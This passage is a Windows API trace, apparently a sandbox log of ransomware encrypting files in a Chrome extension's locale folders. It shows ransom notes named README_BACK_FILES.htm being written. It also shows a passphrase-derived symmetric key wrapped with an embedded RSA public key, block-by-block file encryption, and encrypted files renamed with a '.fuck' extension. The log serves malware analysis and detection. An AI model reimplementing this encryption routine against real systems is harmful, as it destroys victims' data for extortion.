lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.311] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.312] GetFileType (hFile=0x5d64) returned 0x1 [0264.312] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.316] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.316] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0264.316] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.316] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.317] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.317] GetLastError () returned 0x0 [0264.317] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json")) returned 0x20 [0264.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0264.318] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.318] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.320] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.320] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.322] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.322] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.322] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.322] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0264.322] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.322] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.322] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76430) returned 1 [0264.322] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76430, dwCertEncodingType=0x1, pInfo=0x2eae6d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae700*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae708*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ed00) returned 1 [0264.323] CryptEncrypt (in: hKey=0x2e7ed00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.323] CryptEncrypt (in: hKey=0x2e7ed00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76210*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76210*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.323] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e76210*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76210*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.324] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.335] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.335] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.344] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.344] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.344] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.344] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.345] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.345] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.346] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.346] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.347] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x14e, lpOverlapped=0x0) returned 1 [0264.347] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x14e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0264.347] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0264.348] CloseHandle (hObject=0x5d5c) returned 1 [0264.348] CloseHandle (hObject=0x5d60) returned 1 [0264.348] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0264.350] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0264.351] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0264.352] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0264.353] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.353] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0264.353] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.353] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.353] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0264.353] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0264.353] AreFileApisANSI () returned 1 [0264.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.353] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, 